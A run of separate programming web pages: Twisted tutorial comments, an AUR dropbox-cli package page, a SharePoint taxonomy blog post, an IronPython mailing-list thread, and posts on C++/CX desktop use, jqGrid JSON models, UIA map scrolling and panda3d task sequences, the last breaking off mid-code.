With the full complement of Deferreds and their helper classes, you would be able to dispense with the monitor class entirely. Implementing this stuff yourself first is a great way to understand why things are the way they are in a framework like Twisted. In one of the above comments I saw this fragment of code : from twisted.internet import reactor counter1 = Countdown(5) counter2 = Countdown(10) counter3 = Countdown(15) reactor.callWhenRunning(counter1.count_down) reactor.callWhenRunning(counter2.count_down) reactor.callWhenRunning(counter3.count_down) I’d like to ask: are all three of the callWhenRunning() calls asynchronous? Or does the second call wait for the first one to complete? Pardon me if this is a basic question. I seem to have some difficulty in understanding the callbacks. Hi, the callWhenRunning method is a bit special, because it is either synchronous or asynchronous depending on whether the reactor is actually running. If the reactor is running at the time you make the call, it just runs the function right away; it’s like you just called the function yourself. But if the reactor is not running, then the reactor schedules the function to be run once the reactor actually starts up. In the code fragment you saw, callWhenRunning is being called before the reactor is running (before the call to reactor.run()) so it is asynchronous. Does that make sense? If that’s asynchronous, shouldn’t the code give a slightly different output each time? Or at least there’s a chance of obtaining a different output? Please correct me if I am wrong. I’m not sure whether Twisted guarantees that calls scheduled with callWhenRunning will be invoked in order. Of course, if those functions themselves launch asynchronous operations, then in general you cannot expect a particular order of asynchronous operations. However, because of the contrived nature of this example, you may never see different output.
All three calls are executing the same code and that code is simply calling reactor.callLater, rather than performing network communication or communicating with a separate process. Yes. This clears up the cloud of confusion. Thanks! Thoroughly enjoying this! Thanks dave You are welcome, glad you like it! thanks dave nice article You are welcome, thank you! Hi Dave, Thanks for your great series. I have followed your discussion with Plover above and finally worked out the solution to exercise #2 as follows: My basic idea is to set up a manager to handle both the job of monitoring and the managing of the LoopingCall object. In this way, the client code can focus on its main task and only needs to call the finalize method to tell the manager the job is done. Secondly, I want to make the manager a common manager of all kinds of tasks; thus the client must implement an interface with two methods, Name() and Job(), to make the manager aware of its properties without being bound to it. I do not know whether this is a good idea or not. Or could you please give me some indication of further directions for crafting this task? Having a task manager seems like a nice abstraction here. I think you could avoid the finalize callback by having a method on the job for asking if it is done. In terms of Python style, Name() and Job() look more like Java idioms. I would just access .name directly and have a get_job method. Also, _token doesn’t really tell you what that variable is for. How is a dictionary a token? What about _job_name2loop, to remind you what the structure of the dictionary is? Thanks for your reply and the style advice is happily adopted. I am not sure how to avoid the finalize callback. I thought of keeping a property in the countdown class to indicate whether it is done. But I do not know how to make the manager know immediately that the job is done, and I do not like the idea of firing a timer to poll the property in the job periodically.
I suppose there must be some methods in Twisted that can allow two tasks to communicate, but I have no idea what they are. Maybe I am thinking about this issue in too complex a way, but I could not find a way somehow. Could you please give me some indication about this issue? I would make the callback a method on the manager rather than a method on the job. The manager callback would: stop the job’s looping call and clean up any state the manager keeps for that job. The other nice thing about that is the manager can catch exceptions from the job and clean up as well. Like this? I am not sure it is good to make the concrete task aware that a manager exists. In my previous version the task can be used without knowing the manager. A user who does not want to use a manager can use the task as well. They can just leave the default finalize parameter as it is. I still cannot grasp the essence behind this style difference. That’s not quite what I meant. I agree that jobs should not know anything about their manager. Let’s make it a little more concrete. Say job objects have two methods: execute_job and is_done. And the manager has an internal method _execute_job(self, job). The manager would make a looping call like this: LoopingCall(self._execute_job, job). And that method could be something like: Make sense? That’s quite clear. Now I think I know it better. Thanks And this is my final solution: Nice! Hi dave Thanks for the article, I love reading it and it makes all the points quite clear and simple. I tried exercise 1 but was not able to get through it. Since I am new to Python, I would be thankful if you could share some code showing how it actually has to be done; it would be very helpful for me to understand. Thanks Bhaarat
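Since the _execute_job snippet did not survive in the comment above, here is a guess at its shape in plain Python. FakeLoop stands in for Twisted's LoopingCall, and the job interface (name, execute_job, is_done) follows the exchange above; all of these names are assumptions.

```python
class FakeLoop:
    """Stands in for twisted.internet.task.LoopingCall in this sketch."""
    def __init__(self):
        self.running = True

    def stop(self):
        self.running = False

class Manager:
    def __init__(self):
        self._job_name2loop = {}

    def add_job(self, job):
        # With Twisted this would be roughly:
        #   self._job_name2loop[job.name] = LoopingCall(self._execute_job, job)
        self._job_name2loop[job.name] = FakeLoop()

    def _execute_job(self, job):
        # Called on every iteration of the job's looping call.
        try:
            job.execute_job()
        except Exception:
            # The manager can catch job failures and clean up as well.
            self._job_name2loop.pop(job.name).stop()
            raise
        if job.is_done():
            self._job_name2loop.pop(job.name).stop()

class OneShotJob:
    """A job that finishes after a single execution."""
    name = "demo"

    def __init__(self):
        self._done = False

    def execute_job(self):
        self._done = True

    def is_done(self):
        return self._done

m = Manager()
job = OneShotJob()
m.add_job(job)
m._execute_job(job)
print(job.name in m._job_name2loop)  # prints False: loop stopped and removed
```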
http://krondo.com/?p=1333
@rosslaird, seeing the same thing. Interestingly, all the source links on their page now 404. I'd guess it's a mistake...

Package Details: dropbox-cli 2015.10.28-2
Dependencies (2)
Required by (1)
- spacefm-dropbox-plugin (optional)
Sources (2)

Latest Comments

klusark commented on 2017-06-22 05:01

klusark commented on 2017-06-22 04:59

rosslaird commented on 2017-06-22 03:58
Currently getting this:
ERROR: Failure while downloading
Loading the above URL directly from the browser yields a 404, so I'm guessing the file has been moved.

klusark commented on 2017-05-26 23:04
@twa022, I'd rather not make functional changes to the script.

twa022 commented on 2017-05-26 22:38
Could you change the patch to this ()

--- dropbox.py	2011-04-04 20:32:01.000000000 +0200
+++ dropbox.py	2011-04-28 22:55:17.976623103 +0200
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python2
 #
 #
@@ -610,6 +610,10 @@ def start_dropbox():
     db_path = os.path.expanduser(u"~/.dropbox-dist/dropboxd").encode(sys.getfilesystemencoding())
+    if not os.path.exists(db_path):
+        db_path = u"/usr/local/bin/dropbox"
+    if not os.path.exists(db_path):
+        db_path = u"/usr/bin/dropbox"
     if os.access(db_path, os.X_OK):
         f = open("/dev/null", "w")
         # we don't reap the child because we're gonna die anyway, let init do it

so that /usr/local/bin takes precedence over /usr/bin. (Have a dropbox script in /usr/local/bin to export QT_STYLE_OVERRIDE to get proper theming.) Thanks!

robt commented on 2017-02-01 10:24
Thanks, build now works again.

robt commented on 2017-01-29 07:20
The package build is failing with a validation error because dropbox.py has been updated.

doronbehar commented on 2016-10-06 16:16
Is anyone else getting this message?
```
Traceback (most recent call last):
  File "/usr/bin/dropbox-cli", line 826, in <module>
    @alias('stat')
  File "/usr/bin/dropbox-cli", line 705, in command
    meth.__doc__ += u"\nAliases: %s" % ",".join(meth_aliases)
TypeError: unsupported operand type(s) for +=: 'NoneType' and 'unicode'
```

kaslusimoes commented on 2015-11-03 14:06
@bluesheep, @Jones: Try cleaning your build directories. It should work now.

Jones commented on 2015-11-02 16:13
Same for me: "dropbox.py did not pass the validity check"

If they don't put it back soon, I'll upload it to github, as it's GPL.
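For what it's worth, the TypeError in the traceback above is the classic symptom of appending to a missing docstring: a function defined without a docstring has __doc__ set to None, so the += fails. A minimal reproduction in plain Python:

```python
def stat():
    pass  # defined without a docstring, so stat.__doc__ is None

try:
    # Mirrors dropbox-cli's `meth.__doc__ += u"\nAliases: ..."` line.
    stat.__doc__ += "\nAliases: stat"
except TypeError as e:
    print("TypeError:", e)
```

Adding any docstring to the decorated command functions (or guarding the += with a check for None) would avoid the crash.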
https://aur.archlinux.org/packages/dropbox-cli/
- No one (well, almost no one) applies metadata for the sheer joy of it. It’s always for a purpose.
- #1 means that the reason for the system has to be for the end user’s benefit. What can you do if you have this rich metadata applied?
- In order for #2 to come to realization, the metadata has to be present, which means that applying consistent metadata needs to be as easy and ubiquitous as possible.

‘Tagging’ was fine, ‘metadata’ was OK; at ‘taxonomy’:

- Terms – A term is the central object in the taxonomy system. It’s the concept itself. It’s very hard to come up with a name for a concept and have it be sufficiently descriptive and not too vague. Term is what we came up with.
- Labels – Terms have to be known by a bunch of different names. When someone types "check" it should be the same thing as someone that types "cheque". "USA" and "United States" and "United States of America" are all referring to the same term. We call these names labels.
- Default Label – It’s a whole lot easier if one label is the default. You can find it through any of its synonyms, but we’ll display the default label in most circumstances.
- Termset – A collection of related terms in a hierarchy is a termset. Things like "locations" and "products".
- Term Reuse – This is a key point to the system. If you have two termsets "Capitol Cities" and "Locations", the term "London" and all of its synonyms, etc. should be the same in both. We don’t allow a term to have two parents in the same termset, but it can have two parents in different termsets.
- Homographs – A homograph is a single label that refers to more than one distinct term.
- Multiple language support – A given term has a bunch of meaning associated with it. The translations belong to the term in the same way that synonyms do. If a term doesn’t have a translation, we use the default language.
- Groups – Groups in the taxonomy system are simply collections of termsets that share a common security assignment. Termsets and terms aren’t ACL’d, groups are.
- Deprecated terms – if a term shouldn’t be used any more, it can be deprecated. This doesn’t remove it from the system; you just can’t apply it to new content moving forward.
- Terms that are unavailable for tagging – this is slightly different from deprecated terms. A deprecated term is deprecated in all occurrences in the taxonomy and isn’t shown to the user when tagging. Unavailable terms are only unavailable in a specific termset, and are still displayed when browsing the hierarchy at tagging time. The purpose of this is to allow things to be hierarchical without allowing people to tag with the wrong term. For example, in the Capitol Cities termset, you might have continents in it so that people can find a particular city, but they would be marked as unavailable for tagging (with respect to Capitol Cities) because they should not be selectable at tagging time.
- Merging terms – at times, you might get multiple terms in the system that really are the same thing. They might be in the same termset, or they might be in different termsets. When you merge them, you get a single term with all of the properties, and this new term will be reused in all termsets in which the original terms existed.
- Open Termsets – There are times when a highly managed taxonomy makes sense. You shouldn’t be able to add random countries to the list of known countries. However, you probably don’t want to give taxonomy editing permissions to everyone that is creating a new codeword. Open termsets allow content editors to add new terms to a hierarchy at content authoring time. It’s a bit of a meeting point between bottom-up folksonomies and top-down taxonomies.
- Keywords – The degenerate case of a folksonomy is simply a flat list of strings. They have no extra semantic meaning. This is the enterprise keywords termset. Terms here don’t have a hierarchy, definitions, synonyms or translations. However it is possible to move a keyword into a managed termset and add this additional data.
- Local termsets – The taxonomy field type gives you all sorts of useful features, but you probably don’t want "places to order food from" to wind up in your enterprise taxonomy. Local termsets are only visible within a single site collection.
- Termset binding – You can specify what termset a field should be bound to. You can have lots of fields bound to the same termset. When you update the termset, all of the bound fields use the changes immediately.
- Path or node display – You can choose to display the default label of the term by itself "Paris" or its path "Europe > France > Paris".
- Multi-lingual rendering – If a given term has been translated to a given language, when your UI is set to that language, the term translations are displayed.
- Content type syndication – This isn’t a taxonomy feature per se, but it’s part of the enterprise metadata feature set. We allow a term store to have a site collection defined as its "hub". On that hub you can publish content types, and these content types will be pushed out to all consuming site collections. This means that in addition to having a consistent vocabulary across your enterprise, you can have a consistent set of content types using all that goodness.
- Rich editing – when you are applying a term to an item, you can search across the entire termset (including synonyms) or view the tree itself. It makes it possible to choose from thousands of choices, which would normally break lookup and choice fields.
- Editing support in the rich client applications – the document information panel in the Office client applications allows for applying terms.
- Offline editing in the rich client applications – when you edit in the rich client applications, a copy of the bound termsets is cached locally. You can tag on the plane.
Once data is in SharePoint, other SharePoint features can deliver additional goodness:

- Better listview filtering – not only can you filter in the normal "everything with value X" but you can also do inclusive filtering, displaying everything tagged with X or a child of X.
- Better metadata navigation behavior – The metadata navigation feature allows you to navigate through libraries using hierarchies other than the folder hierarchy. The termset is one of the allowed hierarchy types, meaning that you can browse your libraries along multiple axes. You can now free your data from the tyranny of the URL or folder namespace.
- Routing and policy – The document routing feature can direct your content based on the metadata applied to it. Taxonomy fields can even be used to create folder hierarchies at the routing destination. Retention policies can be driven off of taxonomy fields as well.
- File open / save – Can’t remember exactly where your document is stored in a large library? You can use the taxonomy field to filter the open dialog display.

Now that we have all that nice consistent metadata on our content, we can do a few more things:

- Content by query Web Part enhancements – You can configure the CBQ to filter based on taxonomy fields, including descendent inclusion.
- Automatic search refinement – The search system is aware of all taxonomy fields, and if a result set has a sufficient amount of data with the same taxonomy fields, a search refinement will appear, allowing users to filter their data.
- Power user profile and social tagging – it doesn’t make much sense to have a corporate taxonomy and then do your social tagging using just string matching. All of the social properties are actually sourced from the taxonomy system, meaning that you won’t get people asking you where a good place to stay in Paris, France is when you are an expert on Paris, Texas.

Are there plans to expand into the ontology area in the future once people get comfortable with taxonomies?
Hierarchies are great but they don't fit all use cases. Ontologies are important and useful for very large organizations. Keep up the great work.

Thanks Pat for the very interesting story about taxonomy features! We've been using taxonomy for a while in SharePoint 2010 projects and I can say it is a VERY convenient feature. The only downside we've found relates to declarative declarations of taxonomy fields. In the schema we have to specify SspId, GroupId, and AnchorId; but what if someone deploys the taxonomy store through feature activation and only after that step creates taxonomy fields? The only way we've found to create taxonomy fields in that situation was using the Taxonomy API.

You are correct, you need to create taxonomy fields through code, and not through onet.xml. There is a limitation in the current version that makes it impossible to create a taxonomy field any other way. The next blog post should shed some light on this area.

Thanks for the post! You mentioned an interesting feature of overlaying the security model with metadata; did it get implemented in SharePoint 2010? I can't find much info on it. Thanks!

No, unfortunately this version of SharePoint doesn't have the infrastructure for supporting metadata-based ACLs. On the first comment, yes, you need to create the field through code, not xml. The feature xml doesn't work for the taxonomy field. Things like the category field in the enterprise wiki are created through activation code as well. Thanks for the comments, and hope to have some more posts up soon. Pat.

Pat this is a great article, very insightful and easy to understand how you have approached various aspects of the MMS. If I could ask a question: while we can prevent people from editing term sets, can we apply security to term sets to deny users or groups of users access to certain content? E.g.
members of a security group "Human Resources" can only see documents that have the term "Employee Contracts" assigned to them, while general users cannot see those documents?

This article is a few years old now but an excellent introduction to enterprise metadata management. Thanks Pat! Great work!
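For readers hitting the declarative-field limitation discussed in the comments above, creating a taxonomy field through code might look roughly like the sketch below. This is an untested, illustrative sketch only: the site URL, service-application name, group name, and termset name are all assumptions, and error handling is omitted.

```csharp
// Hypothetical sketch: create a taxonomy field through code and bind it
// to a termset, since declarative (onet.xml) creation is not supported.
using (SPSite site = new SPSite("http://server"))  // URL is an assumption
{
    TaxonomySession session = new TaxonomySession(site);
    TermStore termStore = session.TermStores["Managed Metadata Service"]; // name assumed
    TermSet termSet = termStore.Groups["My Group"].TermSets["Locations"]; // names assumed

    // Create the field, then point it at the term store and termset.
    TaxonomyField field =
        site.RootWeb.Fields.CreateNewField("TaxonomyFieldType", "Location")
            as TaxonomyField;
    field.SspId = termStore.Id;    // the term store to bind to
    field.TermSetId = termSet.Id;  // the termset to bind to
    site.RootWeb.Fields.Add(field);
}
```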
https://blogs.msdn.microsoft.com/ecm/2010/06/22/introducing-enterprise-metadata-management/
Dino Viehland wrote:
> You need to override and call the base __new__ instead of __init__. .NET has a simpler construction model than Python does and __new__ is what best corresponds to .NET constructors.
>
> class Derived(Test.Base):
>     def __new__(cls, i):
>         return Test.Base.__new__(cls, i)
>
> d = Derived()

Won't that still blow up? What will .NET use for i in the constructor if you don't provide an argument?

Michael

> From: users-bounces at lists.ironpython.com [mailto:users-bounces at lists.ironpython.com] On Behalf Of Zach Crowell
> Sent: Friday, August 21, 2009 4:39 PM
> To: users at lists.ironpython.com
> Subject: [IronPython] Constructors & inheriting from standard .NET classes
>
> I am unable to inherit from .NET classes which do not define a parameterless constructor. Is this expected behavior? Is there another way to make this inheritance work?
>
> Here's a simple case.
>
> using System;
>
> namespace Test
> {
>     public class Base
>     {
>         public Base(int i)
>         {
>         }
>     }
> }
>
> import clr
> clr.AddReference('Test')
> import Test
>
> class Derived(Test.Base):
>     def __init__(self):
>         pass
>
> d = Derived()
>
> Traceback (most recent call last):
>   File "d:\tmp\class.py", line 9, in d:\tmp\class.py
> TypeError: Derived() takes exactly 2 arguments (1 given)
> _______________________________________________
> Users mailing list
> Users at lists.ironpython.com
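Michael's objection can be illustrated in plain CPython, with an ordinary Python Base standing in for the imported .NET Test.Base (names reused from the thread; no .NET involved):

```python
class Base:
    # Stands in for the .NET Test.Base: construction requires an argument.
    def __new__(cls, i):
        obj = super().__new__(cls)
        obj.i = i
        return obj

class Derived(Base):
    # Forward the constructor argument through __new__, as Dino suggests.
    def __new__(cls, i):
        return Base.__new__(cls, i)

d = Derived(5)
print(d.i)  # prints 5

# And Michael is right: without the argument, construction fails.
try:
    Derived()
except TypeError as e:
    print("TypeError:", e)
```

So the answer to Michael's question is that there is nothing .NET (or Python) can use for i; the caller must supply it, which is why the Derived() call in the original report raised "takes exactly 2 arguments (1 given)".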
https://mail.python.org/pipermail/ironpython-users/2009-August/011101.html
In my first and second post on using WinRT in a desktop app, we’ve used the raw API and then WRL to create and access WinRT objects. It would be easier to access WinRT using the new C++/CX extensions. Can we do that from a desktop app? Let’s give it a try. We’ll start with a regular Win32 Console application project. The first thing we need to do is to enable the C++/CX extensions. Open project properties and navigate to the C/C++ / General node and set “Consume Windows Runtime Extension” to Yes: Building the project now causes the compiler to complain that a certain setting (minimal rebuild) is incompatible with C++/CX, so we have to disable it. Open project properties again and navigate to C/C++ / Code Generation and disable minimal rebuild: Building the project now still fails with an error that says: “could not find assembly ‘platform.winmd’: please specify the assembly search path using /AI or by setting the LIBPATH environment variable”. Clearly, it wants the platform.winmd metadata file. We can find it in a directory like this: C:\Program Files (x86)\Microsoft Visual Studio 11.0\VC\vcpackages. Trying to use this folder with a #using statement (with platform.winmd as suffix) has no effect (for some reason). The way to fix this is to go to project properties again, find the C/C++ / General node and add the folder to the “Additional #using Directories” value: Building the project now fails again, for the same reason, now looking for another file, windows.winmd (that references the entire WinRT API). We need to add the folder this one is found in (C:\Program Files (x86)\Windows Kits\8.0\References\CommonConfiguration\Neutral) to the same value after a semicolon. Now the project finally builds successfully, but the compiler issues a warning, suggesting we replace the classic main() function with one that uses WinRT types. Let’s do that:

using namespace Platform;

int main(Array<String^>^ args) {

All that’s left to do now is use C++/CX as usual.
Here’s an example with the (now classic) Calendar:

#include <iostream>

using namespace std;
using namespace Windows::Globalization;
using namespace Platform;

int main(Array<String^>^ args) {
    auto calendar = ref new Calendar;
    calendar->SetToNow();
    wcout << "It's now " << calendar->HourAsPaddedString(2)->Data() << L":"
          << calendar->MinuteAsPaddedString(2)->Data() << L":"
          << calendar->SecondAsPaddedString(2)->Data() << endl;
    return 0;
}

Astute readers may wonder: where is the WinRT initialization (RoInitialize)? Apparently, this happens automatically when we switch to a WinRT-based main. Switching back to the classic main() throws an exception at runtime, as WinRT is not initialized. We can call RoInitialize() explicitly to mitigate that. In the above code, what apartment is selected for the current thread? We can check that with an API introduced back in Windows 7 (for COM) that allows querying the current apartment the thread is in, CoGetApartmentType:

APTTYPE at;
APTTYPEQUALIFIER atq;
::CoGetApartmentType(&at, &atq);

Looking at the result, it’s the multithreaded apartment. So, there you have it. WinRT from a desktop app. In fact, in the recent documentation refresh, WinRT types are specifically documented as being able or unable to run in a desktop app. Calendar is one that can. And a lot of others can. The more I work with WinRT, the more I feel WinRT is a better COM – it’s the way COM should have been back in the day. Better late than never! Some things are missing, though. When creating a WinRT Component DLL, it does not implement DllRegisterServer, so we can’t automatically register it (via RegSvr32.exe) for desktop app use. For a Store app, that’s not a problem, because the App manifest indicates external dependencies, but desktop apps have no such facility. If it did, we would be almost in COM heaven.

Source: C++/CX Demo

Great article!
It’s very sad that we did not ship any Visual Studio templates that set this up for you, but there is one available now that you can download from the “Extensions and Updates” in Visual Studio – search the online gallery for “CxxWinRTTemplate”. Thanks Sridhar! One comment – in addition to the main format with the (Array<String^>^) arguments, you can also use a traditional int main(…) and adorn it with the [Platform::MTAThread] attribute. The advantage of doing either of these rather than calling RoInitialize explicitly in main() is that the CRT will ensure that WinRT is initialized BEFORE running any user-defined global constructors, and uninitialized AFTER any user-defined global destructors. This allows you to do a global: SomeRefClass^ g_r = ref new SomeRefClass(); This is really only for EXE’s. The traditional DllMain issues remain in WinRT unfortunately :(. – Deon Brewis Microsoft Visual C++ Development Team Thank you for that, Deon! Great article. Could we publish this app on Windows 7 or Vista? Does it work? Thanks a lot. Nope. This only works on Windows 8. I’d like to add one note that I had some trouble with. You may get errors akin to “Platform::Object::Object()” could not be imported because it was already defined. You may see this on an array of type definitions. This will be accompanied by error code C2535. You may also see “use of this type requires a reference to assembly ‘mscorlib'”, accompanied by error code C3624. If you see these errors, your Visual Studio tools are incompatible with the WinRT components you are targeting. I also believe this can arise from a bug in early versions of VS2012. Ensure your version of Visual Studio is compatible with the version of Windows you are targeting. If it is, ensure your version of VS is up to date. Or you’ll spend two days chasing phantoms, like I just did.
For platform.winmd, if you use $(VCInstallDir)vcpackages, then if your solution changes Visual Studio version the reference won’t break. Similarly for windows.winmd, you can use $(WindowsSDKDir)UnionMetadata Thanks! Works as expected for Windows 10 UWP as well. I’ve taken the liberty to republish the recipe here:
http://blogs.microsoft.co.il/pavely/2012/09/29/using-ccx-in-desktop-apps/?replytocom=1329400
jqGrid JSON Java Model I've been using the JQuery plugin jqGrid for several months now. I've been really pleased with it. Up to this point, due to laziness, I've been building my JSON string manually using StringBuilder. Tonight I decided it was time to make this easier. jqGrid accepts different forms of data to represent the grid. I prefer to use JSON because it's very lightweight and transforming Java objects to JSON is a lightweight task. Here is an example of a JSON string used by jqGrid. It is very simple. It only contains two columns of data and a handful of rows.

{"page":"1","records":5,"rows":
 [
  {"cell":["Blue","This is blue"],"id":1},
  {"cell":["Green","This is green"],"id":2},
  {"cell":["Red","This is red"],"id":3},
  {"cell":["Black","This is Black"],"id":4},
  {"cell":["Purple","This is purple"],"id":5}
 ],"total":"1"}

To model this string in Java I had to create two objects, JQGridJSONModel.java and JQGridRow.java. See the code below.

public class JQGridJSONModel {
    private String page;
    private String total;
    private Integer records;
    private List<JQGridRow> rows;
    // getters and setters omitted
}

public class JQGridRow {
    private Integer id;
    private List<String> cell;
    // getters and setters omitted
}

Using these classes is quite simple. To generate the JSON string above I have a Color class that contains an id, name, and description. Once I retrieve the list from the database I do the following.

JQGridJSONModel json = new JQGridJSONModel();
json.setPage("1");
json.setRecords(colors.size());
json.setTotal("1");

List<JQGridRow> rows = new ArrayList<JQGridRow>();
for (Color c : colors) {
    JQGridRow row = new JQGridRow();
    row.setId(c.getId());
    List<String> cells = new ArrayList<String>();
    cells.add(c.getName());
    cells.add(c.getDescription());
    row.setCell(cells);
    rows.add(row);
}
json.setRows(rows);

Then just use your favorite JSON serializer to generate your JSON string. Just make sure you are able to exclude the class parameter that generally gets thrown into the serialization process. I really like FlexJSON.

JSONSerializer serializer = new JSONSerializer();
String jsonResult = serializer.exclude("*.class").deepSerialize(json);

That's it. Feel free to do with this as you wish.
http://www.greggbolinger.com/blog/2008/04/14/1208228820000.html
I recently published my app, State Your Name Please, to the Store. After having done this, I got the great feedback that it really would be preferable for the app to support panning the map via Narrator’s scroll gestures, rather than having to interact with the four explicit panning buttons that I’d added. It turned out this was really easy for me to implement. All I had to do was add support for the UI Automation Scroll Pattern to my custom AutomationPeer which provides the accessibility support for my custom control hosting the map control. By doing this, Narrator would be told that the UI element that it’s interacting with can be scrolled, and Narrator could ask the element to scroll in whatever direction that the user wants to pan.

There are three steps to adding support for the UIA Scroll Pattern to my custom AutomationPeer.

1. Have the AutomationPeer derive from IScrollProvider.
2. Implement the members of IScrollProvider.
3. Override my custom AutomationPeer's GetPatternCore() method to provide UIA clients with an object which supports IScrollProvider.

Note that for this experiment I only implemented IScrollProvider to a point where my app’s map could be scrolled via Narrator’s touch gestures. If this was a shipping app, I’d complete the IScrollProvider implementation. The code snippets below show how I updated my custom AutomationPeer to allow Narrator to scroll the map.

// Add support for the UI Automation Scroll Pattern to the custom control
// which hosts the Map control.
class CustomAutomationPeer : FrameworkElementAutomationPeer, IScrollProvider
{
    // When UIA asks this custom AutomationPeer for an object which implements
    // the Scroll Pattern, return the peer itself.
    protected override object GetPatternCore(PatternInterface patternInterface)
    {
        if (patternInterface == PatternInterface.Scroll)
        {
            return this;
        }

        return base.GetPatternCore(patternInterface);
    }

    // Now implement the Scroll Pattern's properties and methods.

    // Say that the element can scroll both horizontally and vertically.
    public bool VerticallyScrollable { get { return true; } }
    public bool HorizontallyScrollable { get { return true; } }

    // Vertical scrolling extends from the North Pole to the South Pole. (The user cannot
    // pan the map beyond the poles.) So consider a scroll position of 0% to be the South
    // Pole and 100% to be the North Pole.
    public double VerticalScrollPercent
    {
        get
        {
            // Convert the map center's latitude into the appropriate scroll position.
            // Future: Using the center of the map means that in practice the user
            // never actually reaches 0% or 100%. (Instead the scroll is limited
            // to 3% to 97%.) Consider changing this such that from the user's
            // perspective, the scroll is between 0% and 100%.
            return (((mapContainer.MapControl.Center.Latitude + 90.0) * 5.0) / 9.0);
        }
    }

    // Horizontal scrolling is effectively infinite, because the map can be panned
    // left and right forever. As such, we cannot return a meaningful percentage
    // to UIA for the current horizontal scroll percentage. If we were to consider
    // some particular point as both 0% and 100%, (eg the International Date Line,)
    // then Narrator would not allow the user to scroll beyond that, and this app
    // wants to allow infinite panning.
    public double HorizontalScrollPercent
    {
        get
        {
            // Return a value such that Narrator will always allow left and right scrolling,
            // (despite the value being meaningless to the user.)
            return 1;
        }
    }

    // A UIA client has programmatically requested that the element scroll.
    public void Scroll(ScrollAmount horizontalAmount, ScrollAmount verticalAmount)
    {
        // The "PanType" here is an app-specific type used as part of this
        // custom AutomationPeer communicating with the custom control
        // which hosts the map control.
        PanType panType = PanType.panNone;

        // FUTURE: Requests for small and large scrolls result in the
        // same pan distance on the map. Update this to have a large
        // scroll pan further than a small scroll.
if ((horizontalAmount == ScrollAmount.LargeIncrement) || (horizontalAmount == ScrollAmount.SmallIncrement)) { panType = PanType.panRight; } else if ((horizontalAmount == ScrollAmount.LargeDecrement) || (horizontalAmount == ScrollAmount.SmallDecrement)) { panType = PanType.panLeft; } else if ((verticalAmount == ScrollAmount.LargeIncrement) || (verticalAmount == ScrollAmount.SmallIncrement)) { panType = PanType.panDown; } else if ((verticalAmount == ScrollAmount.LargeDecrement) || (verticalAmount == ScrollAmount.SmallDecrement)) { panType = PanType.panUp; } if (panType != PanType.panNone) { // Now ask the custom control hosting the map control to pan // the map in the appropriate direction. mapContainer.ScrollMap(panType); } } // Future: Implement the following... public double VerticalViewSize { get; set; } public double HorizontalViewSize { get; set; } public void SetScrollPercent(double horizontalPercent, double verticalPercent) { } And this is the method that I added to another class in my app, which gets called by the custom AutomationPeer when the map is to be panned in response to a request to scroll via UIA. public void ScrollMap(PanType type) { // Get the current lat/long of the center of the map. Location center = new Location(_map.Center); // Depending on the direction of the pan, move the center to // be at the current bounds of the map view. switch (type) { case PanType.panRight: center.Longitude = _map.Bounds.East; break; case PanType.panLeft: center.Longitude = _map.Bounds.West; break; case PanType.panUp: center.Latitude = _map.Bounds.North; break; case PanType.panDown: center.Latitude = _map.Bounds.South; break; } // Now change the view as required, and request no animation of the view change. _map.SetView(center, TimeSpan.Zero); } Once I’d added the above code, I could use the Inspect SDK tool to verify that the UI element did declare itself to support the UIA Scroll Pattern as expected. Figure 1. 
Inspect showing that the UI element's IsScrollPatternAvailable property is true, and the Scroll Pattern's properties and methods are all exposed.

Now that Narrator's 2-finger scroll gestures can be used in the app to pan the map, I removed the four pan-related buttons that I'd added to the previous version of the app. And to tidy things up further, I also removed my own Zoom In and Zoom Out buttons, replacing them with the buttons provided by the Map control itself. The map control has a ShowNavigationBar property, which, when true, means that the map control will present Zoom In and Zoom Out buttons that the Narrator user can interact with.

As it happens, the visibility of the map control's Zoom In and Zoom Out buttons is tied to the visibility of a few other buttons which the user might not be interested in. (These being the Show Traffic and View Mode buttons.) Also, when a single-finger swipe gesture is used to reach the Zoom In and Zoom Out buttons, the user also reaches a nameless text element inside the Zoom In and Zoom Out buttons. So all these additional elements have to be ignored by the user. Still, using the map control's built-in Zoom In and Zoom Out buttons beats supporting my own buttons for zooming.

One thing I'm keen on is that the app is useful both to people who don't use Narrator and to those who do, and the app does not have an explicit mode for Narrator use. While this requirement has been met, the options in the app are rather confusing now. For example, when Narrator's not running, the map control's Zoom In and Zoom Out buttons appear when the "Show zoom buttons" option is checked, but the buttons can't be interacted with unless the "Enable zoom and pan" option is also set. So at some point I'll probably try to clean up the options a bit to make it clearer exactly what to expect when certain options are checked.
Overall, I'm really pleased with how easy it was to update the app so that the map can be panned via Narrator's 2-finger scroll gesture.
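The latitude-to-percent conversion used in the VerticalScrollPercent property maps the latitude range [-90, 90] onto UIA's scroll range [0, 100]. As a quick sanity check (a sketch I'm adding in Python rather than the app's C#, purely for illustration), the endpoints and midpoint work out as expected:

```python
# Sketch of the VerticalScrollPercent formula from the AutomationPeer:
# percent = ((latitude + 90) * 5) / 9, which maps [-90, 90] onto [0, 100].
def vertical_scroll_percent(latitude):
    """Map a map-center latitude to a UIA vertical scroll percent."""
    return ((latitude + 90.0) * 5.0) / 9.0

assert vertical_scroll_percent(-90.0) == 0.0    # South Pole -> 0%
assert vertical_scroll_percent(0.0) == 50.0     # Equator -> 50%
assert vertical_scroll_percent(90.0) == 100.0   # North Pole -> 100%
```

As the comment in the C# snippet notes, the map center never actually reaches the poles, so in practice the reported percentage stays within roughly 3% to 97%.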
http://blogs.msdn.com/b/winuiautomation/archive/2014/06/15/updating-the-explorable-map-to-add-support-for-scrolling-with-a-screen-reader.aspx
panda3d.core.AsyncTaskSequence

from panda3d.core import AsyncTaskSequence

- __init__(name: str) → None

- setRepeatCount(repeat_count: int) → None

  Sets the repeat count of the sequence. If the count is 0 or 1, the sequence will run exactly once. If it is greater than 1, it will run that number of times. If it is negative, it will run forever until it is explicitly removed.

- getRepeatCount() → int

  Returns the repeat count of the sequence. See setRepeatCount().

- getCurrentTaskIndex() → size_t

  Returns the index of the task within the sequence that is currently being executed (or that will be executed at the next epoch).

  Return type: size_t
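The repeat-count contract above can be illustrated with a small pure-Python sketch. This is not panda3d code (the real AsyncTaskSequence runs inside the task manager); the class and method names below are hypothetical stand-ins that mimic only the documented repeat-count behavior:

```python
# Hypothetical stand-in for the documented repeat-count semantics:
# 0 or 1 -> run once; greater than 1 -> run that many times;
# negative -> run until explicitly removed (capped here so the sketch ends).
class SequenceSketch:
    def __init__(self, tasks):
        self.tasks = tasks
        self.repeat_count = 0
        self.runs = 0

    def set_repeat_count(self, repeat_count):
        self.repeat_count = repeat_count

    def run(self, max_cycles=10):
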